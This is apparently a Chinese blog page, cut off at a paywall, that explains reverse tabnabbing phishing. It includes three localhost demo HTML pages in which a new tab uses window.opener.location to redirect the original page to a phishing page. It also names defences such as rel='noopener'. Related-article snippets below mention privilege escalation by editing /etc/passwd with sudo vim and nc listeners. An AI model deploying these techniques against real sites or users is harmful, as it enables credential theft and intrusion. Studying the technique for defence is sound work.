Reverse Tabnabbing钓鱼

最新推荐文章于 2026-02-21 07:08:50 发布

原创

最新推荐文章于 2026-02-21 07:08:50 发布 · 1.6k 阅读

收录于

Reverse Tabnabbing是一种钓鱼攻击手段，通过创建多个页面，当用户点击正常页面时，会被重定向到恶意网站，而原本的页面变成钓鱼页面。攻击者利用浏览器特性来实现这一过程。为防止此类攻击，可以采取措施如在a标签中添加rel="noopener"，或者在打开新窗口时设置opener为null。

Reverse Tabnabbing钓鱼

希望你以后能过得好，别辜负我一生不打扰

文章目录

Reverse Tabnabbing钓鱼

原理:

使用正常网站A的a标签设置为恶意网站B，恶意网站B中利用window.opener修改原先页面A页面，进而无征兆把访问正常网站A页面修改为钓鱼网站C页面。
两个可以利用点：
1、使用a标签，并且target=_blank,没有使用rel="noopener/noreferrer"属性
2、使用window.open

利用：

创建三个页面A\B\C

A
<html>
<title>正常网站</title>
 <body>
  <li><a href="/https://localhost/b.html" target="_blank" >a标签</a></li>
  <button onclick="window.open('http://localhost/b.html')">window.open</button>
 </body>
</html>

B
<html>
<title>恶意网站</title>
 <body>
  <script>
   if (window.opener) {
      window.opener.location = "http://localhost/c.html";
   }else{alert("no vul");}
  </script>
 </body>
</html>

C
<html>
<head>
    <title>钓鱼网站</title>
</head>
<body>
<li><a href="/https://localhost/b.html" target="_blan

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

SoulCat.

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Tabnabbing Fighter:Phishing Attack Protection-crx插件

03-23

保护您免受Tabnabbing网络钓鱼攻击 Tabnabbing战斗机：保护您免受Tabnabbing网络钓鱼攻击！浏览安全快乐，无需担心标签被打扰！了解什么是Tabnabbing-Tabnabbing是一种计算机利用和网络钓鱼攻击，通过假冒那些网站并说服用户该网站是真实的，说服用户向流行的网站提交其登录详细信息和密码。该攻击利用了用户对选项卡的信任和对细节的不重视，并且使浏览器能够在页面加载后很长一段时间内在非活动选项卡中浏览页面的原始位置。 Tabnabbing与大多数网络钓鱼攻击的不同之处在于，用户不再记得某个选项卡是与登录页面无关的链接的结果，因为假冒的登录页面已加载到浏览器中一个长期打开的选项卡中。我们不希望的是，当我们不浏览时，我们一直在浏览的页面会在背后发生变化。这会让我们感到惊讶。支持语言:English

1 条评论您还未登录，请先登录后发表或查看评论

浅谈对tabnabbing漏洞的理解和利用

SoporAeternus12的博客

04-05

4553

最近在打vulnhub上的靶机的时候卡在了某个点，后来我去网上搜索相关攻略，发现了一个叫reverse tabnabbing的漏洞，由于我之前并没有学习过这个漏洞，所以写了这篇文章来记录一下对这个漏洞的学习成果。漏洞原理和介绍 tabnabbing是一种钓鱼攻击漏洞，网上将该漏洞翻译为反向标签劫持攻击，大致原理就是黑客通过某种方法在页面A中植入一个a标签，也就是一个超链接，链接的指向是黑客精心准备的页面B，页面B的内容有一个javascript代码，内容就是window.opener.location=“

Reverse Tabnabbing漏洞的理解和利用

墨痕诉清风的博客

10-11

405

恶意链接: 攻击者创建一个看似正常的网站或链接，并诱导用户点击。标签切换: 当用户点击链接并在新标签页中打开页面后，攻击者使用 JavaScript 修改该标签页的内容。伪装: 攻击者通过改变网页的外观，使其看起来像用户之前访问过的合法网站（例如银行、社交媒体等）。信息收集: 用户在不知情的情况下输入敏感信息（如用户名和密码），这些信息被攻击者获取。tabnabbing是一种钓鱼攻击漏洞，网上将该漏洞翻译为反向标签劫持攻击，大致原理就是黑客。

4.11.14-测试反向标签

qq_44232452的博客

10-19

225

是一种可以用于将用中重定向到钓鱼页面的攻击。这通常是由于将<a>标签的target属性设置为_blank而导致的，这会导致链接在新选项卡中打开。当同一<a>标签中未使用属性时，新打开的页面可能会影响原始页面，并将其重定向到由攻击者控制的域。由于新选项卡打开时用户位于原始域上，因此他们不太可能注意到页面已更改，尤其是在网络钓鱼页面与原始域相同时。因此，在攻击者控制的域上输入的任何凭据最终都将归攻击者所有。通过JavaScript 函数打开的链接也容易受到此攻击。注意：这是一个遗留问题，不会影响。

16 个前端安全知识

GoldenaArcher的博客

08-31

592

去年 security course 上的是 React，然后学了一些，今年看了一下列表，正好看到了前端也有更新，所以就把这个补上了。一个非常好学习各种安全隐患的机构是其实很多情况下用户不妨问可疑网站就可以解决……但是吧，educate user 永远是一件非常困难的事情，多做做防护也是必要的。

Vulnhub 靶机 Napping 1.0.1 write up Reverse Tabnabbing钓鱼修改root权限的定时py文件 + vim 提权

YouthBelief的博客

01-12

2041

0x00 环境准备下载地址 https://www.vulnhub.com/entry/napping-101,752/ 靶机介绍 Name: Napping: 1.0.1 Date release: 22 Oct 2021 Author: hadrian3689 Series: Napping Description Even Admins can fall asleep on the job 虚拟机 Virtualbox 仅主机 kali也用该网

blankshield 开源项目教程

gitblog_00617的博客

09-01

797

blankshield 开源项目教程项目介绍 blankshield 是一个用于防止 reverse tabnabbing 钓鱼攻击的开源 JavaScript 库。这种攻击通常发生在网页使用 target="_blank" 或 window.open() 打开新标签页时，新标签页可以通过 window.opener.location 重定向原标签页，从而进行钓鱼攻击。bla...

vulnhub靶场6：napping

Genarior的专栏

05-16

345

8、find / -group administrators -type f 2>/dev/null 查看有相同权限的文件，发现了一个query.py。6、启动python3 -m http.server 80 监听,同步nc -lvvp 8000端口监听,获得了账号密码。10、获得反弹shell，查看sudo可执行命令，可以无需密码root权限执行vim。使用sudo vim 修改/etc/passwd文件添加用户。13、使用sudo vim修改/etc/shadow文件。7、ssh登录，查看权限。

Napping靶场实战

Paper_F1nd的博客

07-29

332

在/var/www/html目录下放两个html文件，一个为站点首页(index.html)，一个为钓鱼界面(test.html)在kali上wget下载的网站首页文件为.php，需要重命名为.html。登录后发现可以提交页面，提交完链接后点击here即可跳转到链接界面。在输入链接处，提交创建的钓鱼页面，过个两三分钟后，返回了数据包。通过nmap搜索到靶机ip和开放端口，我们尝试访问80端口。在返回的信息中发现了账号密码，密码这里需要url解码一下。并在kali监听端口，监听的端口为钓鱼页面里链接的端口。

Tabnabbing 攻击 (利用 window.opener.location = …)：如何通过 rel=’noopener’ 或 rel=’noreferrer’ 防御？

weixin_41455464的博客

07-24

1054

想象一下，用户在一个看起来安全的网站上点击了一个链接，打开了一个新标签页。当用户回到之前的标签页时，却发现页面被替换成了假冒的登录页面，要求重新输入密码。很多时候，我们的链接不是写死的，而是动态生成的。最后，安全无小事，希望大家在开发 Web 应用时，时刻保持警惕，关注各种安全风险，并采取相应的防御措施。信息来判断用户是从哪个网站跳转过来的，然后根据不同的来源展示不同的内容，或者进行一些其他的恶意操作。标签页时，看到的就不再是原来的页面，而是一个假的登录页面。这样，无论链接是从哪里来的，都可以保证安全性。

Obsidian双链笔记自动化：用QuickAdd插件5分钟搞定未创建笔记批量生成（附JS脚本）

最新发布

mmm90的博客

02-21

535

本文介绍如何利用Obsidian的QuickAdd插件实现双链笔记的自动化批量创建与管理。通过详细的JS脚本解析和配置指南，帮助用户5分钟内完成未创建笔记的智能生成，解决手动操作效率低下的痛点，显著提升知识管理效率。

napping靶场渗透记录

找寻新世界还为时不晚，因为我的梦想是杨帆到日落之后的地方，尽管现今还无法实现，但旧日的力量曾撼动天地。

10-04

602

napping靶场渗透记录 Even admins can fall asleep on the job

HTML链接标签

weixin_51668410的博客

03-31

594

在这种攻击中，黑客通过在页面A中植入一个a标签（即一个超链接），链接指向黑客精心准备的页面B。页面B的内容包含一个JavaScript代码，该代码的作用是改变用户浏览器的window.opener.location，使其指向一个与页面A非常相似的钓鱼页面C。当用户点击这个链接时，由于JavaScript代码的作用，用户原本所在的页面A会被重定向到页面C，而这个过程是在用户毫无察觉的情况下进行的。这个属性可以保护父页面（即页面A）免受通过子页面（即页面B）进行的反向Tabnabbing的恶意攻击。

metasploit的SET的Credential Harvester Attack Method

天元喜羊羊的博客

05-29

1562

环境：BT5，XP或者Win7，IE6、IE8、谷歌浏览器操作如下： root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 1001

Multi-Attack Web Method

天元喜羊羊的博客

06-29

2421

操作如下： root@bt:~# cd /pentest/exploits/set/ root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 10

《metasploit The PenetrationTester's Guide》读书笔记v2

aurora__的博客

04-26

838

转自吐司，原地址找不到了，希望作者看见能联系，给我个加上原博客地址的机会..笔芯❤️修订说明：v2版全面使用bt5 r1作为测试系统，对笔记中存在的众多错误和遗漏作了更正和补充；目录一．名词解释二．msf基础三．信息探测与收集四．基本漏洞扫描五．基础溢出命令六．METERPRETER七．避开杀软八．使用用户端攻击方式(client-side attacks)九．MSF 附加模块十．社会工程学工具集...

浏览器利用框架BeEF测试

★慕名斋★

11-07

2748

0×00 前言 http://www.vuln.cn/6966 BeEF，全称The Browser Exploitation Framework，是一款针对浏览器的渗透测试工具。目前对其测试的文章不是很多，所以希望通过本次测试给大家带来全新的认识。 0×01 简介工具主页：http://beefproject.com

Windows/Linux 下nc 反弹shell